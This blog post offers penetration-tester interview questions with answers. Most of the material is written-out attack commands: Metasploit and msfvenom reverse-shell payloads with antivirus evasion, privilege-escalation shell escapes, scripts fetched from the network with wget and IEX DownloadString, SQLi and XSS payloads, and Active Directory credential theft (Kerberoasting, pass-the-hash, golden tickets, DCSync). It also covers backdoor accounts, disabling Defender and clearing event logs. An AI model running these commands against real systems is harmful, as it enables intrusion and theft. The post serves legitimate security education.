Interview - Blog | Minova - ATS Resume Builder

Introduction

Penetration Testers (Ethical Hackers) identify security vulnerabilities by simulating real-world attacks. This role requires deep knowledge of hacking techniques, security tools, and methodologies to help organizations strengthen their defenses.

This guide covers essential interview questions for penetration testers, focusing on ethical hacking, vulnerability assessment, and security testing tools.

Penetration Testing Fundamentals

1. What are the phases of a penetration test?

Answer: Structured penetration testing methodology:

1. Planning & Reconnaissance:

Define scope and objectives
Gather intelligence (passive/active)

2. Scanning:

Identify live hosts, open ports, services
Vulnerability scanning

3. Gaining Access:

Exploit vulnerabilities
Obtain initial foothold

4. Maintaining Access:

Install backdoors
Privilege escalation

5. Analysis & Reporting:

Document findings
Provide remediation recommendations

Loading diagram...

Reconnaissance Example:

# Passive reconnaissance
whois target.com
nslookup target.com
dig target.com ANY

# Active reconnaissance
nmap -sn 192.168.1.0/24  # Host discovery
nmap -sV -sC target.com  # Service/version detection

Rarity: Very Common
Difficulty: Medium

Vulnerability Assessment

2. How do you prioritize vulnerabilities?

Answer: Risk-based prioritization using CVSS and business context:

CVSS Scoring:

Critical (9.0-10.0): Remote code execution, authentication bypass
High (7.0-8.9): SQL injection, XSS with data access
Medium (4.0-6.9): Information disclosure, CSRF
Low (0.1-3.9): Minor information leakage

Prioritization Factors:

def calculate_risk_score(vulnerability):
    """Calculate risk score for vulnerability"""
    # Base CVSS score
    cvss_score = vulnerability.cvss_score
    
    # Exploitability
    if vulnerability.exploit_available:
        exploitability = 1.5
    elif vulnerability.poc_available:
        exploitability = 1.2
    else:
        exploitability = 1.0
    
    # Asset criticality
    asset_value = {
        'critical': 3.0,  # Production database
        'high': 2.0,      # Web application
        'medium': 1.5,    # Internal tool
        'low': 1.0        # Test environment
    }[vulnerability.asset_criticality]
    
    # Data sensitivity
    data_sensitivity = {
        'pii': 2.0,       # Personal data
        'financial': 2.5, # Payment info
        'confidential': 1.5,
        'public': 1.0
    }[vulnerability.data_type]
    
    risk_score = cvss_score * exploitability * asset_value * data_sensitivity
    return min(risk_score, 10.0)  # Cap at 10

Rarity: Very Common
Difficulty: Medium

Metasploit

3. How do you use Metasploit to exploit a vulnerability?

Answer: Metasploit Framework workflow:

Basic Exploitation:

# Start Metasploit
msfconsole

# Search for exploit
search ms17-010  # EternalBlue

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue

# Show options
show options

# Set target
set RHOSTS 192.168.1.100

# Set payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444

# Check if target is vulnerable
check

# Run exploit
exploit

Meterpreter Commands:

# System information
sysinfo
getuid

# Privilege escalation
getsystem

# Dump credentials
hashdump
load kiwi
cred_all

# Persistence
run persistence -X -i 60 -p 4444 -r 192.168.1.50

# Pivoting
run autoroute -s 10.0.0.0/24
portfwd add -l 3389 -p 3389 -r 10.0.0.10

Payload Generation:

# Generate reverse shell
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 \
  -f exe -o payload.exe

# Encode to evade AV
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o encoded_payload.exe

Rarity: Very Common
Difficulty: Medium-Hard

4. How do you perform privilege escalation?

Answer: Privilege escalation exploits misconfigurations to gain higher access levels.

Linux Privilege Escalation:

1. Enumeration:

# System information
uname -a
cat /etc/issue
cat /etc/*-release

# Current user and privileges
id
sudo -l

# Users and groups
cat /etc/passwd
cat /etc/group

# SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Writable directories
find / -writable -type d 2>/dev/null

# Cron jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron*

# Network connections
netstat -antup
ss -tulpn

2. Common Techniques:

SUID Exploitation:

# Find SUID binaries
find / -perm -u=s -type f 2>/dev/null

# Example: Exploiting find
find /home -exec /bin/sh \; -quit

# Example: Exploiting vim
vim -c ':!/bin/sh'

# Example: Exploiting nmap (old versions)
nmap --interactive
nmap> !sh

Sudo Misconfiguration:

# Check sudo permissions
sudo -l

# Example output:
# (ALL) NOPASSWD: /usr/bin/vim

# Exploit vim
sudo vim -c ':!/bin/sh'

# Example: LD_PRELOAD
sudo LD_PRELOAD=/tmp/shell.so find

Kernel Exploits:

# Check kernel version
uname -r

# Search for exploits
searchsploit linux kernel 4.4.0

# Example: Dirty COW
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password

3. Automated Tools:

# LinPEAS (Linux Privilege Escalation Awesome Script)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Windows Privilege Escalation:

1. Enumeration:

# System information
systeminfo
hostname
whoami /all

# Users and groups
net user
net localgroup administrators

# Running processes
tasklist /v
wmic process list full

# Services
sc query
wmic service list brief

# Scheduled tasks
schtasks /query /fo LIST /v

# Network connections
netstat -ano

# Installed software
wmic product get name,version

2. Common Techniques:

Unquoted Service Paths:

# Find unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Exploit
C:\Program Files\Vulnerable App\service.exe
# Create malicious executable at:
C:\Program.exe

AlwaysInstallElevated:

# Check registry
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both are 1, create malicious MSI
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

Token Impersonation:

# Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

3. Automated Tools:

# WinPEAS
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
Invoke-WinPEAS

# PowerUp
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

# Sherlock (Kernel exploits)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
Find-AllVulns

Rarity: Very Common
Difficulty: Hard

Burp Suite

5. How do you find SQL Injection using Burp Suite?

Answer: Systematic SQL injection testing:

1. Intercept Request:

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=test123

2. Send to Repeater: Test manual payloads:

username=admin' OR '1'='1&password=test
username=admin' AND 1=1--&password=test
username=admin' UNION SELECT NULL--&password=test

3. Use Intruder:

Attack Type: Sniper
Payload Position: username=§admin§
Payload List:
  ' OR '1'='1
  ' OR 1=1--
  ' UNION SELECT NULL--
  ' UNION SELECT NULL,NULL--
  admin'--
  ' OR 'a'='a

4. Analyze Responses:

Different response lengths
Error messages
Time delays (blind SQLi)

Advanced Testing:

# Blind SQL injection detection
import requests
import time

def test_blind_sqli(url, param):
    # Time-based detection
    payloads = [
        "' AND SLEEP(5)--",
        "' OR SLEEP(5)--",
        "'; WAITFOR DELAY '00:00:05'--"
    ]
    
    for payload in payloads:
        start = time.time()
        response = requests.post(url, data={param: payload})
        elapsed = time.time() - start
        
        if elapsed > 5:
            print(f"[+] Blind SQLi found with payload: {payload}")
            return True
    
    return False

Rarity: Very Common
Difficulty: Medium

Web Application Testing

6. How do you test for XSS vulnerabilities?

Answer: Comprehensive XSS testing approach:

Types of XSS:

Reflected: Payload in URL/form, reflected immediately
Stored: Payload stored in database
DOM-based: Client-side JavaScript vulnerability

Testing Methodology:

1. Identify Injection Points:

# URL parameters
http://target.com/search?q=<script>alert(1)</script>

# Form inputs
<input name="comment" value="<script>alert(1)</script>">

# HTTP headers
User-Agent: <script>alert(1)</script>

2. Bypass Filters:

// Basic payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

// Bypass filters
<scr<script>ipt>alert(1)</script>
<img src=x onerror="alert(1)">
<IMG SRC=x ONERROR=alert(1)>  // Case variation

// Event handlers
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>

// Encoded payloads
&#60;script&#62;alert(1)&#60;/script&#62;
\u003cscript\u003ealert(1)\u003c/script\u003e

3. Burp Suite XSS Testing:

Intruder Payload List:
  <script>alert(document.domain)</script>
  <img src=x onerror=alert(1)>
  <svg/onload=alert(1)>
  javascript:alert(1)
  <iframe src="javascript:alert(1)">

4. Automated Scanning:

# XSStrike
python xsstrike.py -u "http://target.com/search?q=test"

# Dalfox
dalfox url http://target.com/search?q=FUZZ

Rarity: Very Common
Difficulty: Medium

7. How do you test API security?

Answer: API security testing focuses on authentication, authorization, and input validation.

Common API Vulnerabilities:

1. Broken Authentication:

# Test weak JWT
curl -H "Authorization: Bearer eyJhbGciOiJub25lIn0..." https://api.example.com/user

# JWT with "alg": "none"
# Modify payload and remove signature

2. Broken Authorization:

# IDOR (Insecure Direct Object Reference)
curl https://api.example.com/user/123
curl https://api.example.com/user/124  # Try other user IDs

# Test different HTTP methods
curl -X DELETE https://api.example.com/user/123
curl -X PUT https://api.example.com/user/123 -d '{"role":"admin"}'

3. Mass Assignment:

# Try adding admin fields
curl -X POST https://api.example.com/register \
  -H "Content-Type: application/json" \
  -d '{
    "username": "attacker",
    "password": "pass123",
    "role": "admin",
    "is_admin": true
  }'

REST API Testing:

# Automated API testing
import requests
import json

class APISecurityTester:
    def __init__(self, base_url, token=None):
        self.base_url = base_url
        self.headers = {}
        if token:
            self.headers['Authorization'] = f'Bearer {token}'
    
    def test_idor(self, endpoint, id_range):
        """Test for IDOR vulnerabilities"""
        accessible_ids = []
        
        for user_id in range(id_range[0], id_range[1]):
            url = f"{self.base_url}/{endpoint}/{user_id}"
            response = requests.get(url, headers=self.headers)
            
            if response.status_code == 200:
                accessible_ids.append(user_id)
                print(f"[+] Accessible: {user_id}")
        
        return accessible_ids
    
    def test_rate_limiting(self, endpoint):
        """Test rate limiting"""
        for i in range(1000):
            response = requests.get(
                f"{self.base_url}/{endpoint}",
                headers=self.headers
            )
            
            if response.status_code == 429:
                print(f"[+] Rate limiting enforced after {i} requests")
                return True
        
        print("[-] No rate limiting detected")
        return False
    
    def test_injection(self, endpoint, payloads):
        """Test for injection vulnerabilities"""
        for payload in payloads:
            data = {"search": payload}
            response = requests.post(
                f"{self.base_url}/{endpoint}",
                headers=self.headers,
                json=data
            )
            
            # Check for SQL errors
            if any(err in response.text.lower() for err in 
                   ['sql', 'mysql', 'sqlite', 'postgresql', 'oracle']):
                print(f"[!] Potential SQL injection: {payload}")
                print(f"Response: {response.text[:200]}")
    
    def test_authentication_bypass(self, login_endpoint):
        """Test authentication bypass"""
        bypass_payloads = [
            {"username": "admin' OR '1'='1", "password": "anything"},
            {"username": "admin", "password": "' OR '1'='1"},
            {"username": "admin'--", "password": ""},
        ]
        
        for payload in bypass_payloads:
            response = requests.post(
                f"{self.base_url}/{login_endpoint}",
                json=payload
            )
            
            if response.status_code == 200:
                print(f"[!] Potential auth bypass: {payload}")

# Usage
tester = APISecurityTester('https://api.example.com')
tester.test_idor('users', (1, 100))
tester.test_rate_limiting('api/search')

GraphQL Testing:

# Introspection query
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      fields {
        name
        args {
          name
          type { name }
        }
      }
    }
  }
}

# GraphQL injection
query = '''
query {
  user(id: "1' OR '1'='1") {
    id
    username
    email
  }
}
'''

# GraphQL batching attack
queries = [
    {"query": "query { user(id: 1) { id username } }"},
    {"query": "query { user(id: 2) { id username } }"},
    # ... repeat 1000 times
]

response = requests.post(
    'https://api.example.com/graphql',
    json=queries
)

API Fuzzing:

# Using ffuf for API fuzzing
ffuf -w wordlist.txt -u https://api.example.com/FUZZ -mc 200,301,302

# Parameter fuzzing
ffuf -w params.txt -u https://api.example.com/api?FUZZ=test -mc 200

# Method fuzzing
for method in GET POST PUT DELETE PATCH OPTIONS; do
    curl -X $method https://api.example.com/api/resource
done

Postman/Burp Suite:

// Postman pre-request script
const payload = "' OR '1'='1";
pm.environment.set("injection_payload", payload);

// Postman test script
pm.test("Check for SQL error", function () {
    pm.expect(pm.response.text()).to.not.include("SQL");
    pm.expect(pm.response.text()).to.not.include("mysql");
});

OWASP API Security Top 10:

Broken Object Level Authorization - Test IDOR
Broken Authentication - Test weak tokens
Excessive Data Exposure - Check response data
Lack of Resources & Rate Limiting - Test DoS
Broken Function Level Authorization - Test privilege escalation
Mass Assignment - Test parameter pollution
Security Misconfiguration - Check headers, CORS
Injection - Test SQLi, NoSQLi, command injection
Improper Assets Management - Find old API versions
Insufficient Logging & Monitoring - Check audit logs

Rarity: Common
Difficulty: Medium-Hard

Network Penetration Testing

8. How do you perform network penetration testing?

Answer: Structured network assessment:

1. Network Discovery:

# Ping sweep
nmap -sn 192.168.1.0/24

# ARP scan (local network)
arp-scan -l

# Identify live hosts
netdiscover -r 192.168.1.0/24

2. Port Scanning:

# TCP SYN scan (stealth)
nmap -sS 192.168.1.100

# Service version detection
nmap -sV 192.168.1.100

# OS detection
nmap -O 192.168.1.100

# Aggressive scan
nmap -A -T4 192.168.1.100

# All ports
nmap -p- 192.168.1.100

3. Vulnerability Scanning:

# Nmap NSE scripts
nmap --script vuln 192.168.1.100

# Specific vulnerability
nmap --script smb-vuln-ms17-010 192.168.1.100

# OpenVAS/Nessus for comprehensive scanning

4. Exploitation:

# SMB exploitation
use exploit/windows/smb/ms17_010_eternalblue

# SSH brute force
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

5. Post-Exploitation:

# Lateral movement
# Credential dumping
# Privilege escalation
# Persistence

Rarity: Very Common
Difficulty: Hard

9. How do you attack Active Directory environments?

Answer: Active Directory is a prime target with many attack vectors.

Enumeration:

# PowerView enumeration
Import-Module PowerView.ps1

# Get domain information
Get-Domain
Get-DomainController

# Enumerate users
Get-DomainUser
Get-DomainUser -Identity administrator

# Enumerate groups
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"

# Find shares
Find-DomainShare -CheckShareAccess

# Find computers
Get-DomainComputer

BloodHound:

# Collect data with SharpHound
.\SharpHound.exe -c All

# Or with PowerShell
Import-Module SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

# Upload JSON to BloodHound GUI
# Analyze attack paths to Domain Admins

Kerberoasting:

# Request service tickets
Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

# Or with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

AS-REP Roasting:

# Find users with "Do not require Kerberos preauthentication"
Get-DomainUser -PreauthNotRequired

# Request AS-REP
.\Rubeus.exe asreproast /outfile:asrep_hashes.txt

# Crack
hashcat -m 18200 asrep_hashes.txt wordlist.txt

Pass-the-Hash:

# Using Impacket
python3 psexec.py -hashes :ntlmhash [email protected]

# Using CrackMapExec
crackmapexec smb 10.10.10.0/24 -u administrator -H ntlmhash

# Dump SAM
python3 secretsdump.py -hashes :ntlmhash [email protected]

Pass-the-Ticket:

# Export tickets with Mimikatz
mimikatz # sekurlsa::tickets /export

# Inject ticket
mimikatz # kerberos::ptt ticket.kirbi

# Or with Rubeus
.\Rubeus.exe ptt /ticket:ticket.kirbi

Golden Ticket:

# Get krbtgt hash
mimikatz # lsadump::dcsync /domain:example.com /user:krbtgt

# Create golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /krbtgt:hash /id:500

# Inject ticket
mimikatz # kerberos::ptt ticket.kirbi

Silver Ticket:

# Get service account hash
mimikatz # sekurlsa::logonpasswords

# Create silver ticket for specific service
mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /target:server.example.com /service:cifs /rc4:hash

DCSync Attack:

# Mimikatz
mimikatz # lsadump::dcsync /domain:example.com /user:Administrator

# Impacket
python3 secretsdump.py example.com/user:[email protected]

Lateral Movement:

# PSExec
.\PsExec.exe \\target -u domain\user -p password cmd

# WMI
wmic /node:target /user:domain\user /password:password process call create "cmd.exe"

# PowerShell Remoting
Enter-PSSession -ComputerName target -Credential domain\user

# RDP
xfreerdp /u:domain\user /p:password /v:target

Persistence:

# Create domain admin
net user backdoor Password123! /add /domain
net group "Domain Admins" backdoor /add /domain

# Golden ticket (long-term)
# Silver ticket (specific service)

# Skeleton key (Mimikatz)
mimikatz # misc::skeleton
# Now any user can authenticate with password "mimikatz"

Defense Evasion:

# Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true

# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Obfuscate PowerShell
Invoke-Obfuscation

Rarity: Common
Difficulty: Hard

Reporting

10. What should a penetration testing report include?

Answer: Comprehensive reporting structure:

Executive Summary:

High-level findings
Business impact
Risk overview
Recommendations

Technical Details:

## Finding: SQL Injection in Login Form

**Severity:** Critical (CVSS 9.8)

**Description:**
The login form at /admin/login is vulnerable to SQL injection,
allowing attackers to bypass authentication and access admin panel.

**Affected Asset:**
- URL: https://target.com/admin/login
- Parameter: username
- Method: POST

**Proof of Concept:**
```http
POST /admin/login HTTP/1.1
Host: target.com

username=admin' OR '1'='1'--&password=anything

Impact:

Unauthorized access to admin panel
Access to sensitive customer data
Potential database compromise

Remediation:

Use parameterized queries
Implement input validation
Apply principle of least privilege to database user

Rarity: Very Common
Difficulty: Medium

Conclusion

Penetration tester interviews require hands-on experience and deep technical knowledge. Focus on:

Methodology: Structured testing approach, documentation
Vulnerability Assessment: Risk prioritization, CVSS scoring
Tools: Metasploit, Burp Suite, Nmap, custom scripts
Privilege Escalation: Linux and Windows techniques, automation tools
Web Testing: SQL injection, XSS, authentication bypass
API Testing: REST/GraphQL security, authorization flaws
Network Testing: Scanning, exploitation, lateral movement
Active Directory: Kerberoasting, Pass-the-Hash, BloodHound
Reporting: Clear documentation, business impact, remediation

Practice in legal environments (HackTheBox, TryHackMe), pursue certifications (OSCP, CEH), and stay updated with latest vulnerabilities. Good luck!

Table of Contents

Penetration Tester Interview Questions: Complete Guide

Introduction

Penetration Testing Fundamentals

1. What are the phases of a penetration test?

Vulnerability Assessment

2. How do you prioritize vulnerabilities?

Metasploit

3. How do you use Metasploit to exploit a vulnerability?

4. How do you perform privilege escalation?

Burp Suite

5. How do you find SQL Injection using Burp Suite?

Web Application Testing

6. How do you test for XSS vulnerabilities?

7. How do you test API security?

Network Penetration Testing

8. How do you perform network penetration testing?

9. How do you attack Active Directory environments?

Reporting

10. What should a penetration testing report include?

Conclusion

Build a Resume That Gets You Hired 60% Faster

Share this post

Weekly career tips that actually work

Weekly career tips that actually work

Related Posts

Junior Security Engineer Interview Questions: Complete Guide

Senior Security Engineer Interview Questions: Complete Guide

Senior DevOps Engineer Interview Questions: Complete Guide

Build a Resume That Gets You Hired 60% Faster

Share this post

Beat the 75% ATS Rejection Rate